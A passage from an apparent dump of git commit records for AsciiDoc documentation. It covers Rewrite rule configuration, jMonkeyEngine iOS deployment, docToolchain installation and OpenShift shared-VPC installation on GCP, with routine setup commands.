most operation instances.\n\n`.where(\"path\").matches(\".*\")`:: Configures the +Parameter+ named \"+path+\", and specifies that it must match the link:http:\/\/ocpsoft.org\/opensource\/guide-to-regular-expressions-in-java-part-1\/[regular expression] pattern \"+.*+\"\n\n==== Add another operation\n\nNow say we wish to forward each inbound request to a Servlet or JSP that will handle the request and render a response for the client. We can achieve this by adding the +Forward+ operation to the set of operations to be performed when all rule conditions have been met. Forwards are purely internal operations, and the client browser URL will not be updated.\n\n[source,java]\n----\nConfigurationBuilder.begin()\n         .addRule()\n         .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n         .perform(Log.message(Level.INFO, \"Client requested path: {path}\")\n                  .and(Forward.to(\"\/Servlet?path={path}\")))\n         .where(\"path\").matches(\".*\");\n----\n\nNotice that we have specified a new Operation: +Forward.to(\"\/Servlet?path={path}\")+; this will again re-use the \"+path+\" parameter. 
The example below demonstrates how an inbound request will be forwarded to an inbound resource.\n\nTIP: Operations are performed in the order in which they are added to the rule, so make sure that breaking operations such as +Forward+, +Redirect+, +Substitute+, and +Lifecycle+ are added last, or your +Operation+ may not be performed.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cb9b37f9d8df19db62e9e929d5c7b7ec38aafc8","subject":"Update ios.adoc","message":"Update ios.adoc\n\nBroke long monospace into 2 lines.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/ios.adoc","new_file":"src\/docs\/asciidoc\/jme3\/ios.adoc","new_contents":"= ios\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, iOS, Mac, MacOS, deployment, platform\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== iOS Deployment\n\nTo use iOS deployment you need a computer running MacOSX and a version of Xcode 4.0+ installed. To deploy to a device or the Apple App Store, you need an Apple developer account.\n\n\n[WARNING]\n====\nNote that at the moment iOS deployment is in alpha state.\n====\n\n\niOS deployment works via cross-compilation to native iOS ARM code; there is no virtual machine running on the device. The Avian JVM supports this feature while maintaining general compatibility with OpenJDK and JNI for native access. The minimum compatible iOS deployment target is 4.3.\n\n\n[TIP]\n====\nTo install the iOS deployment plugin, go to Tools\u2192Plugins and under \u201cAvailable plugins\u201d select the \u201ciOS Support\u201d plugin.\n====\n\n\n\n=== Enabling iOS deployment\n\nTo enable iOS deployment, go to the project settings and under \u201cApplication\u2192iOS\u201d select the \u201cEnable iOS deployment\u201d checkbox, adapt the application ID and then press OK.\n\nimage:jme3\/ios-deployment.png[ios-deployment.png,width=\"\",height=\"\"]\n\nAfter enabling deployment, a new `ios` directory is created in the project root that contains a `project` and a `src` folder. The `ios\/project` folder contains an Xcode project that you will use to build and run the final iOS application for both iPhone and iPad. The `ios\/src` folder contains Java and native source files for bridging iOS and native code; you can add .java and .m files with your own iOS code here.\n\n\n[IMPORTANT]\n====\nWhen you enable iOS deployment for the first time or any time that the Avian library and OpenJDK are updated, they will be extracted to your SDK settings folder; wait until they have been extracted before building an iOS-enabled project.\n====\n\n\n\n=== Building the iOS binaries\n\nThe iOS binaries are automatically built when you have iOS deployment enabled and build your project in the jME3 SDK.\n\nWhen the iOS binaries are built, all needed classes, including a complete copy of the OpenJDK7 classes, are run through a proguard process that strips out the unnecessary classes for the project and optimizes the code for the platform. This happens without changing the naming structure so that reflection etc. still works. If necessary, adapt the proguard options in the ios properties file.\n\nAfter the iOS classpath has been created the avian compiler is used to create a native .o file from the classpath for both arm (device) and i386 (simulator). 
Furthermore, the other needed avian .o files are extracted and a library list is compiled, which is referenced in the Xcode project.\n\nIf an error occurs about jni.h not being found, either install the SDK for 10.9 in Xcode or set the header search path in the Xcode project settings, in the default project that's +\n`\/Applications\/Xcode.app\/Contents\/Developer\/Platforms\/MacOSX.platform\/Developer\/` +\n`SDKs\/MacOSX10.9.sdk\/System\/Library\/Frameworks\/JavaVM.framework\/Headers\/`\n\n\n=== Running and deploying the application\n\nTo run the application, open the Xcode project under `ios\/project` in Xcode and press the run button. You can make changes to the UI and native invocation classes in the Xcode project as well. From here you can also deploy the application to your devices or the App Store.\n\n[TIP]\n====\nNote that you should also adapt the project settings like application name and registration package in Xcode before deploying the final application.\n====\n\n\n\n=== Creating native and Java code for iOS\n\nTo bridge between native and Java code, JNI is used like in a normal Java application. The `ios\/src` folder is for Java and C\/Obj-C source files that are specific to your iOS application. In these Java files you have access to the full project classpath as well as the iOS-specific jME3 classes.\n\nThe JmeAppHarness.java class is initialized and called from native code through the default project and you can extend it to perform other native operations. It has a simple native popup method. The JmeAppHarness.m file contains the native method needed for that popup.\n\nEffectively native code can reside in both the Xcode project and in the `ios\/src` folder. To keep the dependencies clean and make code reusable you should try to put generic native code that does not depend on the Xcode project in the `ios\/src` folder. You can also mix and match ARC and non-ARC code through this by converting the main project to use ARC and putting code with manual memory management in the `ios\/src` folder.\n\nJava code for iOS should be in the `ios\/src` folder as well for clean separation; it's also the only place where they will be compiled with a reference to the iOS specific jME classes. For information on how to connect your application code and device specific code, see the <<jme3\/android#using_android_specific_functions,notes in the android deployment documentation>>.\n","old_contents":"= ios\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, iOS, Mac, MacOS, deployment, platform\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== iOS Deployment\n\nTo use iOS deployment you need a computer running MacOSX and a version of Xcode 4.0+ installed. To deploy to a device or the Apple App Store, you need an Apple developer account.\n\n\n[WARNING]\n====\nNote that at the moment iOS deployment is in alpha state.\n====\n\n\niOS deployment works via cross-compilation to native iOS ARM code; there is no virtual machine running on the device. The Avian JVM supports this feature while maintaining general compatibility with OpenJDK and JNI for native access. 
The minimum compatible iOS deployment target is 4.3.\n\n\n[TIP]\n====\nTo install the iOS deployment plugin, go to Tools\u2192Plugins and under \u201cAvailable plugins select the \u201ciOS Support plugin.\n====\n\n\n\n=== Enabling iOS deployment\n\nTo enable iOS deployment, go to the project settings and under \u201cApplication\u2192iOS select the \u201cEnable iOS deployment checkbox, adapt the application ID and then press OK.\n\nimage:jme3\/ios-deployment.png[ios-deployment.png,width=\"\",height=\"\"]\n\nAfter enabling deployment, a new `ios` directory is created in the project root that contains a `project` and a `src` folder. The `ios\/project` folder contains an Xcode project that you will use to build and run the final iOS application for both iPhone and iOS. The `ios\/src` folder contains java and native source files for bridging iOS and native code, you can add .java and .m files with your own iOS code here.\n\n\n[IMPORTANT]\n====\nWhen you enable iOS deployment for the first time or any time that the Avian library and OpenJDK is updated, they will be extracted to your SDK settings folder, wait until it has been extracted before building an iOS-enabled project.\n====\n\n\n\n=== Building the iOS binaries\n\nThe iOS binaries are automatically built when you have iOS deployment enabled and build your project in the jME3 SDK.\n\nWhen the iOS binaries are built, all needed classes, including a complete copy of the OpenJDK7 classes are run through a proguard process that strips out the unnecessary classes for the project and optimizes the code for the platform. This happens without changing the naming structure so that reflection etc. still works. If necessary, adapt the proguard options in the ios properties file.\n\nAfter the iOS classpath has been created the avian compiler is used to create a native .o file from the classpath for both arm (device) and i386 (simulator). Furthermore the other needed avian .o files are extracted and a library list is compiled which is referenced in the Xcode project.\n\nIf an error occurs about jni.h not being found, either install the SDK for 10.9 in XCode or set the header search path in the XCode project settings, in the default project thats +\n`\/Applications\/Xcode.app\/Contents\/Developer\/Platforms\/MacOSX.platform\/Developer\/SDKs\/MacOSX10.9.sdk\/System\/Library\/Frameworks\/JavaVM.framework\/Headers\/`\n\n\n=== Running and deploying the application\n\nTo run the application, open the Xcode project under `ios\/project` in Xcode and press the run button. You can make changes to the UI and native invocation classes in the Xcode project as well. From here you can also deploy the application to your devices or the App Store.\n\n[TIP]\n====\nNote that you should also adapt the project settings like application name and registration package in Xcode before deploying the final application.\n====\n\n\n\n=== Creating native and java code for iOS\n\nTo bridge between native and java code, JNI is used like in a normal java application. The `ios\/src` folder is for Java and C\/Obj-C source files that are specific to your iOS application. In these java files you have access to the full project classpath as well as the iOS-specific jME3 classes.\n\nThe JmeAppHarness.java class is initialized and called from native code through the default project and you can extend it to perform other native operations. It has a simple native popup method. 
The JmeAppHarness.m file contains the native method needed for that popup.\n\nEffectively native code can reside in both the Xcode project and in the `ios\/src` folder. To keep the dependencies clean and make code reusable you should try to put generic native code that does not depend on the Xcode project in the `ios\/src` folder. You can also mix and match ARC and non-ARC code through this by converting the main project to use ARC and putting code with manual memory management in the `ios\/src` folder.\n\nJava code for iOS should be in the `ios\/src` folder as well for clean separation, its also the only place where they will be compiled with a reference to the iOS specific jME classes. For information on how to connect your application code and device specific code, see the <<jme3\/android#using_android_specific_functions,notes in the android deployment documentation>>.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"42817b584de3c08aa6e617890c7762029cba2512","subject":"two additional fixes","message":"two additional fixes","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/02_install.adoc","new_file":"src\/docs\/manual\/02_install.adoc","new_contents":":filename: manual\/02_install.adoc\n\n= How to install docToolchain\n\ninclude::feedback.adoc[]\n\n== Get the tool\n\nTo start with docToolchain you need to get a copy of the current docToolchain repository.\nThe easiest way is to clone the repository without history and remove the `.git` folder:\n\n.Linux with git clone\n[source,bash]\n----\ngit clone --recursive https:\/\/github.com\/docToolchain\/docToolchain.git <docToolchain home>\nrm -rf .git\nrm -rf resources\/asciidoctor-reveal.js\/.git\nrm -rf resources\/reveal.js\/.git\n----\n\nThe `--recursive` option is required because the repository contains two submodules: `resources\/asciidoctor-reveal.js` and `resources\/reveal.js`.\n\nAnother way is to download the zipped git repository and rename it:\n\n.Linux with download as zip\n[source, bash]\n----\nwget https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip\nunzip master.zip\n\n# fetching dependencies\n\ncd docToolchain-master\/resources\n\nrm -d reveal.js\nwget https:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip -O reveal.js.zip\nunzip reveal.js.zip\nmv reveal.js-tags-3.3.0 reveal.js\n\nrm -d asciidoctor-reveal.js\nwget https:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip -O asciidoctor-reveal.js.zip\nunzip asciidoctor-reveal.js.zip\nmv asciidoctor-reveal.js-9667f5c5d926b3be48361d6d6413d3896954894c asciidoctor-reveal.js\n\nmv docToolchain-master <docToolchain home>\n----\n\n\nIf you work (like me) on a Windows environment, just download and unzip the https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip[repository] as well as its dependencies:\nhttps:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip[reveal.js] and\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip[asciidoctor-reveal.js].\n\nAfter unzipping, put the dependencies in the `resources` folder, so that the structure is the same as on https:\/\/github.com\/docToolchain\/docToolchain\/tree\/master\/resources[GitHub].\n\n\/\/[source]\n\/\/----\n\/\/(New-Object\u00a0Net.WebClient).DownloadFile('https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip','master.zip')\n\/\/----\n\nYou can add <docToolchain home>\/bin to your PATH or you 
can run doctoolchain with its full path if you prefer.\n\n== Initialize directory for documents\n\nThe next step after getting docToolchain is to initialize a directory where your documents live. In docToolchain this\ndirectory is named \"newDocDir\" during initialization, or just \"docDir\" later on.\n\n=== Existing documents\n\nIf you already have some existing documents in AsciiDoc format in your project, you need to put the configuration\nfile there to tell docToolchain what to process and how. You can do that manually by copying the contents of the\ntemplate_config directory. You can also do that by running the `initExisting` task.\n\n.Linux initExisting example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initExisting -PnewDocDir=<your directory>\n----\n\nYou need to open the Config.groovy file and configure the names of your files properly.\nYou may also change the PDF schema file to your taste.\n\n=== arc42 from scratch\n\nIf you don't have existing documents yet, or if you need a fresh start, you can get the https:\/\/arc42.org[arc42] template in AsciiDoc\nformat. You can do that by manually downloading it from https:\/\/arc42.org\/download. You can also do that by running\nthe `initArc42<language>` task. Currently supported languages are:\n\n- DE - German\n- EN - English\n- ES - Spanish\n- RU - Russian\n\n.Linux initArc42EN example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initArc42EN -PnewDocDir=<newDocDir>\n----\n\nThe Config.groovy file is then preconfigured to use the downloaded template.\n\nIMPORTANT: there is currently https:\/\/github.com\/docToolchain\/docToolchain\/issues\/259[a bug] in the setup \/ configuration if you use this approach to install docToolchain. To work around it, go to <docToolchain home> and set the `inputPath` property in `gradle.properties` to `.`. Alternatively, use the approach described in our https:\/\/docs-as-co.de\/getstarted\/tutorial2[tutorial].\n\nTIP: Blog-Post: https:\/\/rdmueller.github.io\/arc42\/[Let's add Content!]\n\n== Build\n\nThis should already be enough to start a first build.\n\nBy now, docToolchain should be installed as a command line tool and the path to its `bin` folder should be on your PATH.\nIf you now switch to your freshly initialized <newDocDir>, you should be able to execute the following commands:\n\n.Linux\n[source, bash]\n----\ndoctoolchain <docDir> generateHTML\ndoctoolchain <docDir> generatePDF\n----\n\n.Windows\n[source]\n----\ndoctoolchain.bat <docDir> generateHTML\ndoctoolchain.bat <docDir> generatePDF\n----\n\n<docDir> may be relative, e.g. 
\".\", or absolute.\n\nAs a result, you will see the progress of your build together with some warnings, which you can just ignore for the moment.\n\nThe first build generates some files within `<docDir>\/build`:\n\n[source]\n----\nbuild\n|-- html5\n| |-- arc42-template.html\n| `-- images\n| |-- 05_building_blocks-EN.png\n| |-- 08-Crosscutting-Concepts-Structure-EN.png\n| `-- arc42-logo.png\n`-- pdf\n |-- arc42-template.pdf\n `-- images\n |-- 05_building_blocks-EN.png\n |-- 08-Crosscutting-Concepts-Structure-EN.png\n `-- arc42-logo.png\n----\n\n*Congratulations!* If you see the same folder structure, you just managed to render the standard arc42 template as HTML and PDF!\n\nIf you didn't get the right output, please raise an issue on https:\/\/github.com\/docToolchain\/docToolchain\/issues[GitHub].\n\nTIP: Blog-Posts: https:\/\/rdmueller.github.io\/enterprise-edition\/[Behind the great Firewall], https:\/\/rdmueller.github.io\/enterprise-edition2\/[Enterprise AsciiDoctor]\n\n== Publish to Confluence\n\nIn addition to `Config.groovy` there is also a `scripts\/ConfluenceConfig.groovy` file. If you are not using Confluence,\nyou can remove it. If you use Confluence, then you need to open this file and adapt it to your environment.\nYou can also create multiple copies of that file. For example, you can have `ConfluenceConfig.groovy` for publishing\nofficial pages, and `MyConfluenceConfig.groovy` with a different Confluence space for reviews.\n\nThe paths to those configuration files can be provided by giving the -P option to doctoolchain, for example:\n\n[source, bash]\n----\n# Uses scripts\/ConfluenceConfig.groovy by default\ndoctoolchain <docDir> publishToConfluence --no-daemon -q\n\n# Uses scripts\/MyConfluenceConfig.groovy\ndoctoolchain <docDir> publishToConfluence -PconfluenceConfigFile=scripts\/MyConfluenceConfig.groovy --no-daemon -q\n----\n","old_contents":":filename: manual\/02_install.adoc\n\n= How to install docToolchain\n\ninclude::feedback.adoc[]\n\n== Get the tool\n\nTo start with docToolchain you need to get a copy of the current docToolchain repository.\nThe easiest way is to clone the repository without history and remove the `.git` folder:\n\n.Linux with git clone\n[source,bash]\n----\ngit clone --recursive https:\/\/github.com\/docToolchain\/docToolchain.git <docToolchain home>\nrm -rf .git\nrm -rf resources\/asciidoctor-reveal.js\/.git\nrm -rf resources\/reveal.js\/.git\n----\n\n`--recursive` option is required because the repository contains 2 submodules - `resources\/asciidoctor-reveal.js` and `resources\/reveal.js`.\n\nAnother way is to download the zipped git repository and rename it:\n\n.Linux with download as zip\n[source, bash]\n----\nwget https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip\nunzip master.zip\n\n# fetching dependencies\n\ncd docToolchain-master\/resources\n\nrm -d reveal.js\nwget https:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip -O reveal.js.zip\nunzip reveal.js.zip\nmv reveal.js-tags-3.3.0 reveal.js\n\nrm -d asciidoctor-reveal.js\nwget https:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip -O asciidoctor-reveal.js.zip\nunzip asciidoctor-reveal.js.zip\nmv asciidoctor-reveal.js-9667f5c5d926b3be48361d6d6413d3896954894c asciidoctor-reveal.js\n\nmv docToolchain-master <docToolchain home>\n----\n\n\nIf you work (like me) on a Windows environment, just download and unzip the https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip[repository] as well as its 
dependencies:\nhttps:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip[reveal.js] and\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip[asciidoctor-reveal.js].\n\nAfter unzipping, put the dependencies in `resources` folder, so that the structure is the same as on https:\/\/github.com\/docToolchain\/docToolchain\/tree\/master\/resources[GitHub].\n\n\/\/[source]\n\/\/----\n\/\/(New-Object\u00a0Net.WebClient).DownloadFile('https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip','master.zip')\n\/\/----\n\nYou can add <docToolchain home>\/bin to your PATH or you can run doctoolchain with full path if you prefer.\n\n== Initialize directory for documents\n\nThe next step after getting docToolchain is to initialize a directory where your documents live. In docToolchain this\ndirectory is named \"newDocDir\" during initialization, or just \"docDir\" later on.\n\n=== Existing documents\n\nIf you already have some existing documents in AsciiDoc format in your project, you need to put the configuration\nfile there to inform docToolchain what and how to process. You can do that manually by copying the contents of\ntemplate_config directory. You can also do that by running `initExisting` task.\n\n.Linux initExisting example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initExisting -PnewDocDir=<your directory>\n----\n\nYou need to open Config.groovy file and configure names of your files properly.\nYou may also change the PDF schema file to your taste.\n\n=== arc42 from scratch\n\nIf you don't have existing documents yet, or if you need a fresh start, you can get the https:\/\/arc42.org[arc42] template in AsciiDoc\nformat. You can do that by manually downloading from https:\/\/arc42.org\/download. You can also to that by running\n`initArc42<language>` task. Currently supported languages are:\n\n- DE - German\n- EN - English\n- ES - Spanish\n- RU - Russian\n\n.Linux initArc42EN example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initArc42EN -PnewDocDir=<newDocDir>\n----\n\nThe Config.groovy file is then preconfigured to use the downloaded template.\n\nIMPORTANT: there is currently https:\/\/github.com\/docToolchain\/docToolchain\/issues\/259[a bug] in the setup \/ configuration if you use this approach to install docToolchain. To workaround it, go to <docToolchain home> and set the `inputPath` property in `gradle.properties` to `.`. Alternativly, use the approach described in our https:\/\/docs-as-co.de\/getstarted\/tutorial2[tutorial].\n\nTIP: Blog-Post: https:\/\/rdmueller.github.io\/arc42\/[Let's add Content!]\n\n== Build\n\nThis should already be enough to start a first build.\n\nBy now, docToolchain should be installed as command line tool and the path to its `bin` folder should be on your path.\nIf you now switch to your freshly initialized <newDocDir>, you should be able to execute the following commands:\n\n.Linux\n[source, bash]\n----\ndoctoolchain <docDir> generateHTML\ndoctoolchain <docDir> generatePDF\n----\n\n.Windows\n[source]\n----\ndoctoolchain.bat <docDir> generateHTML\ndoctoolchain.bat <docDir> generatePDF\n----\n\n<docDir> may be relative, e.g. 
\".\", or absolute.\n\nAs a result, you will see the progress of your build together with some warnings which you can just ignore for the moment.\n\nThe first build generated some files within the `<docDir>\/build`:\n\n[source]\n----\nbuild\n|-- html5\n| |-- arc42-template.html\n| `-- images\n| |-- 05_building_blocks-EN.png\n| |-- 08-Crosscutting-Concepts-Structure-EN.png\n| `-- arc42-logo.png\n`-- pdf\n |-- arc42-template.pdf\n `-- images\n |-- 05_building_blocks-EN.png\n |-- 08-Crosscutting-Concepts-Structure-EN.png\n `-- arc42-logo.png\n----\n\n*Congratulations!* if you see the same folder structure, you just managed to render the standard arc42 template as html and pdf!\n\nIf you didn't get the right output, please raise an issue on https:\/\/github.com\/docToolchain\/docToolchain\/issues[github]\n\nTIP: Blog-Posts: https:\/\/rdmueller.github.io\/enterprise-edition\/[Behind the great Firewall], https:\/\/rdmueller.github.io\/enterprise-edition2\/[Enterprise AsciiDoctor]\n\n== Publish to Confluence\n\nIn addition to `Config.groovy` there is also a `scripts\/ConfluenceConfig.groovy` file. If you are not using Confluence\nyou can remove it. If you use Confluence, then you need to open this file and adapt to your environment.\nYou can also create multiple copies of that file. For example you can have `ConfluenceConfig.groovy` for publishing\nofficial pages, and `MyConfluenceConfig.groovy` with a different Confluence space for reviews.\n\nThe paths to those configuration files can be provided by giving -P option to doctoolchain, for example:\n\n[source, bash]\n----\n# Uses scripts\/ConfluenceConfig.groovy by default\nbin\/doctoolchain <docDir> publishToConfluence --no-daemon -q\n\n# Uses scripts\/MyConfluenceConfig.groovy\nbin\/doctoolchain <docDir> publishToConfluence -PconfluenceConfigFile=scripts\/MyConfluenceConfig.groovy --no-daemon -q\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ddeb47c90d7e9c9384ce1e434daeac90b2238845","subject":"BZ-1857151: Added a paragraph about shared VPC with link","message":"BZ-1857151: Added a paragraph about shared VPC with link\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"installing\/installing_gcp\/installing-gcp-user-infra-vpc.adoc","new_file":"installing\/installing_gcp\/installing-gcp-user-infra-vpc.adoc","new_contents":"[id=\"installing-gcp-user-infra-vpc\"]\n= Installing a cluster with shared VPC on user-provisioned infrastructure in GCP by using Deployment Manager templates\ninclude::modules\/common-attributes.adoc[]\n:context: installing-gcp-user-infra-vpc\n\ntoc::[]\n\nIn {product-title} version {product-version}, you can install a cluster into a shared Virtual Private Cloud (VPC) on Google Cloud Platform (GCP) that uses infrastructure that you provide. In this context, a cluster installed into a shared VPC is a cluster that is configured to use a VPC from a project different from where the cluster is being deployed.\n\nA shared VPC enables an organization to connect resources from multiple projects to a common VPC network. You can communicate within the organization securely and efficiently by using internal IPs from that network. For more information about shared VPC, see link:https:\/\/cloud.google.com\/vpc\/docs\/shared-vpc[Shared VPC overview] in the GCP documentation.\n\nThe steps for performing a user-provisioned infrastructure installation into a shared VPC are outlined here. 
Several\nlink:https:\/\/cloud.google.com\/deployment-manager\/docs[Deployment Manager] templates are provided to assist in\ncompleting these steps or to help model your own. You are also free to create\nthe required resources through other methods.\n\n[IMPORTANT]\n====\nThe steps for performing a user-provisioned infrastructure installation are provided as an example only. Installing a cluster with infrastructure you provide requires knowledge of the cloud provider and the installation process of {product-title}. Several Deployment Manager templates are provided to assist in completing these steps or to help model your own. You are also free to create the required resources through other methods; the templates are just an example.\n====\n\n== Prerequisites\n\n* Review details about the\nxref:..\/..\/architecture\/architecture-installation.adoc#architecture-installation[{product-title} installation and update]\nprocesses.\n* If you use a firewall and plan to use telemetry, you must\nxref:..\/..\/installing\/install_config\/configuring-firewall.adoc#configuring-firewall[configure the firewall to allow the sites] that your cluster requires access to.\n* If you do not allow the system to manage identity and access management (IAM),\nthen a cluster administrator can\nxref:..\/..\/installing\/installing_gcp\/manually-creating-iam-gcp.adoc#manually-creating-iam-gcp[manually\ncreate and maintain IAM credentials]. Manual mode can also be used in\nenvironments where the cloud IAM APIs are not reachable.\n+\n[NOTE]\n====\nBe sure to also review this site list if you are configuring a proxy.\n====\n\n[id=\"csr-management-gcp-vpc\"]\n== Certificate signing requests management\n\nBecause your cluster has limited access to automatic machine management when you\nuse infrastructure that you provision, you must provide a mechanism for approving\ncluster certificate signing requests (CSRs) after installation. The\n`kube-controller-manager` only approves the kubelet client CSRs. The\n`machine-approver` cannot guarantee the validity of a serving certificate\nthat is requested by using kubelet credentials because it cannot confirm that\nthe correct machine issued the request. 
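As a reference point, pending requests are typically inspected and, once verified, approved with the CLI; a sketch (it does not replace your own verification policy):\n\n[source,terminal]\n----\n$ oc get csr\n$ oc adm certificate approve <csr_name>\n----\n\n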
You must determine and implement a\nmethod of verifying the validity of the kubelet serving certificate requests\nand approving them.\n\n[id=\"installation-gcp-user-infra-config-project-vpc\"]\n== Configuring the GCP project that hosts your cluster\n\nBefore you can install {product-title}, you must configure a Google Cloud\nPlatform (GCP) project to host it.\n\ninclude::modules\/installation-gcp-project.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-enabling-api-services.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-limits.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-service-account.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-permissions.adoc[leveloffset=+3]\ninclude::modules\/installation-gcp-regions.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-install-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-config-host-project-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-gcp-dns.adoc[leveloffset=+2]\ninclude::modules\/installation-creating-gcp-vpc.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-vpc.adoc[leveloffset=+3]\n\ninclude::modules\/installation-user-infra-generate.adoc[leveloffset=+1]\n\ninclude::modules\/installation-initializing-manual.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-shared-vpc-config-yaml.adoc[leveloffset=+2]\n\ninclude::modules\/installation-configure-proxy.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-three-node-cluster.adoc[leveloffset=+2]\n\ninclude::modules\/installation-user-infra-generate-k8s-manifest-ignition.adoc[leveloffset=+2]\n.Additional resources\n\n[id=\"installation-gcp-user-infra-exporting-common-variables-vpc\"]\n== Exporting common variables\n\ninclude::modules\/installation-extracting-infraid.adoc[leveloffset=+2]\ninclude::modules\/installation-user-infra-exporting-common-variables.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-lb.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-ext-lb.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-int-lb.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-private-dns.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-private-dns.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-firewall-rules-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-firewall-rules.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-iam-shared-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-iam-shared-vpc.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-rhcos.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-bootstrap.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-bootstrap.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-control-plane.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-control-plane.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-wait-for-bootstrap.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-worker.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-worker.adoc[leveloffset=+2]\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+1]\n\ninclude::modules\/cli-logging-in-kubeadmin.adoc[leveloffset=+1]\n\ninclude::modules\/installation-approve-csrs.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infr
a-adding-ingress.adoc[leveloffset=+1]\n\n[id=\"installation-gcp-user-infra-vpc-adding-firewall-rules\"]\n== Adding ingress firewall rules\nThe cluster requires several firewall rules. If you do not use a shared VPC, these rules are created by the ingress controller via the GCP cloud provider. When you use a shared VPC, you can either create cluster-wide firewall rules for all services now or create each rule based on events, when the cluster requests access. By creating each rule when the cluster requests access, you know exactly which firewall rules are required. By creating cluster-wide firewall rules, you can apply the same rule set across multiple clusters.\n\nIf you choose to create each rule based on events, you must create firewall rules after you provision the cluster and during the life of the cluster when the console notifies you that rules are missing. Events that are similar to the following event are displayed, and you must add the firewall rules that are required:\n\n[source,terminal]\n----\n$ oc get events -n openshift-ingress --field-selector=\"reason=LoadBalancerManualChange\"\n----\n\n.Example output\n[source,terminal]\n----\nFirewall change required by security admin: `gcloud compute firewall-rules create k8s-fw-a26e631036a3f46cba28f8df67266d55 --network example-network --description \"{\\\"kubernetes.io\/service-name\\\":\\\"openshift-ingress\/router-default\\\", \\\"kubernetes.io\/service-ip\\\":\\\"35.237.236.234\\\"}\\\" --allow tcp:443,tcp:80 --source-ranges 0.0.0.0\/0 --target-tags exampl-fqzq7-master,exampl-fqzq7-worker --project example-project`\n----\n\nIf you encounter issues when creating these rule-based events, you can configure the cluster-wide firewall rules while your cluster is running.\n\ninclude::modules\/installation-creating-gcp-shared-vpc-cluster-wide-firewall-rules.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-creating-gcp-shared-vpc-ingress-firewall-rules.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infra-completing.adoc[leveloffset=+1]\n\n== Next steps\n\n* xref:..\/..\/post_installation_configuration\/cluster-tasks.adoc#available_cluster_customizations[Customize your cluster].\n* If necessary, you can\nxref:..\/..\/support\/remote_health_monitoring\/opting-out-of-remote-health-reporting.adoc#opting-out-remote-health-reporting_opting-out-remote-health-reporting[opt out of remote health reporting].\n","old_contents":"[id=\"installing-gcp-user-infra-vpc\"]\n= Installing a cluster with shared VPC on user-provisioned infrastructure in GCP by using Deployment Manager 